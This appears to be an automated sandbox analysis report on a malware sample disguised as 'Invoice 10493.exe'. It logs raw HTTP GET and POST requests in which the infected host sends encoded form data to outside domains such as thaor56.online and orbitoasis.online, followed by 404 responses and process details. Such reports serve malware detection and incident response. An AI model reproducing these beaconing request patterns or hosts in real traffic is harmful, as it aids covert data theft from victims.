                                                                                  Data Ascii: IUY=gPB62ZG2yPe0OFTPJtletOHsYtNaeGRNITAt1G7gvD5v5mkGvjFaP5gYGYXRLCAqWs7Q6UwbYvgJ18V0Hvl97QaKzZoQiP4gfOyai7RzgCRY1P7sh+Ajt2r38kYXoBkliqwm0LWv2Wd449XtjRNGzwMqJnHxPbA/wg6p+CImjdrwJgqPsrOX+5ytcNkFBEgAgORAsIygkPfnh6YYRR/DG3QhnIhozO9RYjSxqV2V+Z5zc8KBa24lZmZ5jk5fD/I7LH9KH3/mr7+hUV7Z+c0q32+dW7jmIViyRY6N7RXbREsM4rlmGeLAtWgX3j73cyMvCHPdKZ7ByVC5DZ4RTw2kQxO43F9UnJkQzcxZPG9jSj26qFtENQWXQUE7awLc6UbdmFRPd5EPfH4eL2k16stNegcaGNVIzRxKi+RaQ4hnkhp8yOv5uyukMiqV6XPFPAHtkKTTDRPrF3cED24tnSiwAwvP3kD+4sUCKslfYx/5+/Z43JKrNwWI3o6k5ZGRG5zZq0BplPfENrpjciq7u6G5oXrO6zSi4GdP9Zv4FySU+VBdv+GIzQl0nuBIdDt/35ruMxGiLyEFlqQFFsy+U7rwX9ZLdf6pBh++C8/r5R4GpmMIxOBnYU+AiCSjVO/oOKOJ5eRqm6EyQe2xihfb4B/7QDA/yaN922R55aITW3W3Vb3ZLvn/UFvb2x2Ipgd12JfiahEs1NTzrSKIIV5x5TM5z8lF6Smw+4t8P8/rTgRJ+Ss+3H2IXECsIsdO0sO2cMfR9VZk0r6GYRJoynoVBWIh4uo02vSUoiwYsoXQCsvAeQRGoQDyL1p0Gzw9OCfl3E/qujTn/FdG7N30witEfeKiH/sdLZf0zjj4bet7urfkmGqeRCzt0kdd7YYXMEhL0GOMQJWCs6HaHYPcpBrfJa+FG7jkROPMYroRzAEexUiEAMMLye1JUqAboKFSet7OR46yo3bJskW+uyttN16z/0KHVNWapWKUKMx8YyHqKX1oDtpBc9mg [TRUNCATED]
                                                                                  Dec 4, 2024 17:15:14.488303900 CET5360OUTData Raw: 79 4c 48 74 54 39 6a 45 6c 69 73 4f 79 6f 6a 79 70 64 4f 31 47 59 44 32 65 58 4c 72 53 59 37 2f 48 74 79 69 72 61 78 33 79 38 51 62 77 7a 68 6d 63 74 45 6c 4c 61 44 70 4c 6c 2b 55 6f 68 78 67 6a 76 44 77 56 78 4a 49 41 5a 33 35 6e 53 61 6f 47 76
                                                                                  Data Ascii: yLHtT9jElisOyojypdO1GYD2eXLrSY7/Htyirax3y8QbwzhmctElLaDpLl+UohxgjvDwVxJIAZ35nSaoGvsQEb2Onljbi0C84E18GXiZpgA5FnILu39yUMW8zB54yr7W7yoj1ucIJ9Mg3n2tKxLzBXQ6Agp/jvWXC70uPRQBHuW0GTNUQIeHVTELy83w1p8bgXgf1mslMYdrq/Ipxip4MCUpXiP9Sbvyth77/vv4+EUhJm20jdK
                                                                                  Dec 4, 2024 17:15:14.702820063 CET1289INHTTP/1.1 404 Not Found
                                                                                  keep-alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  transfer-encoding: chunked
                                                                                  content-encoding: gzip
                                                                                  vary: Accept-Encoding
                                                                                  date: Wed, 04 Dec 2024 16:15:14 GMT
                                                                                  server: LiteSpeed
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  connection: close
                                                                                  Data Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                                  Data Ascii: 1359ZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|Jf7~Nh@b?ls^yyV^2 [TRUNCATED]
                                                                                  Dec 4, 2024 17:15:14.702877998 CET1289INData Raw: f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7 ac 7d 98 45 fa 89 df bd e2 c7 28 7f 43 f1 12 49 3f 38 14 f5 54 5e b4 34 b9 3d 17 dc 90 f8 75 2f bf 22 fa de d3 fb 81 be 5d a3 f6 47 8f fb f5 7d 1f bc b0 00 e1
                                                                                  Data Ascii: O0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9nr~g2_F]r|8OXf
                                                                                  Dec 4, 2024 17:15:14.703107119 CET1289INData Raw: d4 36 19 5b 4a a0 8e ed b3 39 e4 18 5e e5 73 7f b4 4e 0f e7 64 4b 5b fa b8 e2 ba 28 d8 b4 f8 e8 74 c6 05 26 41 8e 5c c3 ed 27 cc b8 61 8d bd bb a5 d4 20 9d 47 aa ce c3 e1 58 66 53 66 01 07 ad d5 cc 8a 51 12 2a 73 61 6d 2e b9 21 d1 e5 34 5f c4 a4
                                                                                  Data Ascii: 6[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-i$,^Lkr#JWcv?f|e)MbHZp9M)e1>qZB0t-Zm>Tj3V=3+L`
                                                                                  Dec 4, 2024 17:15:14.703203917 CET1289INData Raw: f6 d6 8b b8 c4 61 28 37 f0 6b b7 5e 27 72 05 95 41 a4 b9 73 07 6f 46 e3 54 99 d8 32 3b 13 9a 8c 85 a0 ce 69 f2 0c 1c ef 98 7c b8 f2 32 be 13 ca 03 72 9a 02 1e 04 bd 2e c7 65 b2 09 48 51 d8 f0 62 3b ab 16 a7 71 2d 8f 14 17 6e a9 b4 a0 bb 65 4a 99
                                                                                  Data Ascii: a(7k^'rAsoFT2;i|2r.eHQb;q-neJ'qF*fAC2hxAkuZW4,F6Q;:fWSRWd@vHNgfD1zO[h6x<&8PDaz$d[DWu$P[;.n)Nkt56!]i,NK
                                                                                  Dec 4, 2024 17:15:14.703284025 CET74INData Raw: fa 67 c0 7c af b3 97 a2 e2 dd 37 e6 7b 7d f1 bf ff 0b 54 80 d0 d1 e0 9a da 07 26 7b 36 9b 79 63 90 f7 f8 7a 84 af ad f6 08 3f e7 af c7 cb 33 b9 6f bf fd 0f 00 00 00 ff ff 03 00 ec f1 b7 4f 84 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: g|7{}T&{6ycz?3oO'0


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  37192.168.11.204977966.29.132.19480
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:15:17.208558083 CET493OUTGET /k6yn/?h7i-=tZtx&IUY=tNpa1p20+8HvGGTFO8FkkeyNbaBnDGg9aQgmgnvjgQBap2YCvQVXfu0lL5fLGicbWcSejDEnKeIqzsVAbPYV9SmH+8E676AUWIvi1rNZuDh4+Pmog8xR0m4= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.orbitoasis.online
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Dec 4, 2024 17:15:17.411350965 CET1289INHTTP/1.1 404 Not Found
                                                                                  keep-alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  transfer-encoding: chunked
                                                                                  date: Wed, 04 Dec 2024 16:15:17 GMT
                                                                                  server: LiteSpeed
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  connection: close
                                                                                  Data Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                                  Data Ascii: 2784<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                                  Dec 4, 2024 17:15:17.411384106 CET1289INData Raw: 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74
                                                                                  Data Ascii: 0%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A;
                                                                                  Dec 4, 2024 17:15:17.411667109 CET1289INData Raw: 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30
                                                                                  Data Ascii: text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0;
                                                                                  Dec 4, 2024 17:15:17.411691904 CET1289INData Raw: 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: : 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; }
                                                                                  Dec 4, 2024 17:15:17.422348022 CET1289INData Raw: 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f
                                                                                  Data Ascii: fRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4
                                                                                  Dec 4, 2024 17:15:17.422580957 CET1289INData Raw: 37 70 34 38 35 45 53 41 56 6d 75 6c 64 76 7a 53 54 4b 77 32 66 71 48 53 47 4d 35 68 42 57 31 49 55 49 30 66 2f 4c 64 4f 4e 74 45 55 4b 58 47 43 39 35 6a 4b 2b 52 67 34 51 42 56 77 4e 6d 6c 65 50 5a 56 6a 54 78 75 6f 32 34 6b 57 4d 72 51 48 67 2f
                                                                                  Data Ascii: 7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQ
                                                                                  Dec 4, 2024 17:15:17.422605991 CET1289INData Raw: 61 70 69 34 34 72 46 70 66 71 54 5a 41 6e 57 2b 4a 46 52 47 33 6b 66 39 34 5a 2b 73 53 71 64 52 31 55 49 69 49 2f 64 63 2f 42 36 4e 2f 4d 39 57 73 69 41 44 4f 30 30 41 33 51 55 30 68 6f 68 58 35 52 54 64 65 43 72 73 74 79 54 31 57 70 68 55 52 54
                                                                                  Data Ascii: api44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght3Mb5y1NINq+beZBu8d84657wPYfN8pZBc0g+JKiKYiNr9r4v1Zrvdbtazp16TSCOfZppMiGD6iVqr27
                                                                                  Dec 4, 2024 17:15:17.422624111 CET1289INData Raw: 6e 6c 69 6e 65 2f 63 70 5f 65 72 72 6f 72 64 6f 63 75 6d 65 6e 74 2e 73 68 74 6d 6c 20 70 6f 72 74 20 38 30 20 6f 6e 20 57 65 64 6e 65 73 64 61 79 2c 20 30 34 2d 44 65 63 2d 32 30 32 34 20 31 31 3a 31 35 3a 31 37 20 45 53 54 22 3e 20 57 65 62 4d
                                                                                  Data Ascii: nline/cp_errordocument.shtml port 80 on Wednesday, 04-Dec-2024 11:15:17 EST"> WebMaster</a>. </section> <p class="reason-text">The server cannot find the requested page:</p> </div> <section class="addit
                                                                                  Dec 4, 2024 17:15:17.432913065 CET34INData Raw: 6f 6f 74 65 72 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: ooter> </body></html>0


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  38192.168.11.2049780202.92.5.2380
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:15:22.824903965 CET760OUTPOST /cboa/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.thaor56.online
                                                                                  Origin: http://www.thaor56.online
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 200
                                                                                  Connection: close
                                                                                  Referer: http://www.thaor56.online/cboa/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 58 64 64 7a 52 46 58 70 53 35 69 49 5a 39 33 30 71 66 4f 52 33 2f 31 32 6a 49 64 73 4a 63 39 50 64 4b 54 5a 57 46 30 62 30 70 50 67 37 45 6f 4f 30 48 6d 70 32 72 2b 46 63 58 7a 64 69 45 43 4e 7a 32 4a 69 56 67 64 4b 4d 56 57 48 41 4c 6b 72 57 57 43 55 48 30 66 37 6c 47 72 41 50 61 57 63 4e 4e 7a 48 56 51 55 7a 53 6d 46 42 35 38 59 6b 33 4b 70 41 35 51 51 63 4e 5a 45 6e 71 35 2b 6b 6b 74 57 63 4a 4d 78 44 6e 30 48 7a 6e 46 4e 62 59 74 62 6a 7a 58 4b 30 61 39 42 75 70 31 4c 4a 5a 32 5a 64 66 6b 4c 58 6e 63 61 44 50 6c 45 31 45 33 6c 6c 62 74 6e 77 35 63 68 72 70 38 76 75 44 51 3d 3d
                                                                                  Data Ascii: IUY=XddzRFXpS5iIZ930qfOR3/12jIdsJc9PdKTZWF0b0pPg7EoO0Hmp2r+FcXzdiECNz2JiVgdKMVWHALkrWWCUH0f7lGrAPaWcNNzHVQUzSmFB58Yk3KpA5QQcNZEnq5+kktWcJMxDn0HznFNbYtbjzXK0a9Bup1LJZ2ZdfkLXncaDPlE1E3llbtnw5chrp8vuDQ==
                                                                                  Dec 4, 2024 17:15:23.198362112 CET1289INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 1251
                                                                                  date: Wed, 04 Dec 2024 16:15:23 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                  Dec 4, 2024 17:15:23.198371887 CET181INData Raw: 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73
                                                                                  Data Ascii: d Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  39192.168.11.2049781202.92.5.2380
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:15:25.729345083 CET780OUTPOST /cboa/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.thaor56.online
                                                                                  Origin: http://www.thaor56.online
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Referer: http://www.thaor56.online/cboa/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 58 64 64 7a 52 46 58 70 53 35 69 49 5a 63 48 30 6d 65 4f 52 2f 2f 31 78 6d 49 64 73 53 4d 39 78 64 4b 50 5a 57 41 4d 78 30 37 72 67 38 68 55 4f 37 6c 65 70 78 72 2b 46 49 48 7a 63 68 30 43 57 7a 32 45 64 56 6c 64 4b 4d 56 43 48 41 4a 38 72 58 6c 71 58 45 45 66 35 77 57 72 43 42 36 57 63 4e 4e 7a 48 56 51 41 5a 53 6d 4e 42 34 4d 49 6b 34 4c 70 66 6c 67 51 66 45 35 45 6e 75 35 2b 6f 6b 74 57 69 4a 4e 74 35 6e 32 50 7a 6e 45 39 62 62 38 62 67 6f 48 4b 75 55 64 42 2f 36 33 37 4d 58 6d 56 53 5a 56 54 63 6f 38 47 30 4f 7a 4a 76 5a 46 52 42 59 2b 37 43 39 73 59 44 72 2b 75 31 65 61 75 46 34 46 6c 71 68 33 4c 51 6b 75 2b 74 42 6c 45 65 35 55 4d 3d
                                                                                  Data Ascii: IUY=XddzRFXpS5iIZcH0meOR//1xmIdsSM9xdKPZWAMx07rg8hUO7lepxr+FIHzch0CWz2EdVldKMVCHAJ8rXlqXEEf5wWrCB6WcNNzHVQAZSmNB4MIk4LpflgQfE5Enu5+oktWiJNt5n2PznE9bb8bgoHKuUdB/637MXmVSZVTco8G0OzJvZFRBY+7C9sYDr+u1eauF4Flqh3LQku+tBlEe5UM=
                                                                                  Dec 4, 2024 17:15:26.100743055 CET1289INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 1251
                                                                                  date: Wed, 04 Dec 2024 16:15:25 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                  Dec 4, 2024 17:15:26.100760937 CET181INData Raw: 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73
                                                                                  Data Ascii: d Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:11:10:43
                                                                                  Start date:04/12/2024
                                                                                  Path:C:\Users\user\Desktop\Invoice 10493.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\Invoice 10493.exe"
                                                                                  Imagebase:0x7e0000
                                                                                  File size:1'225'216 bytes
                                                                                  MD5 hash:AC2D5E685321A9AB4F14FC509D2618C0
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:11:10:46
                                                                                  Start date:04/12/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):true
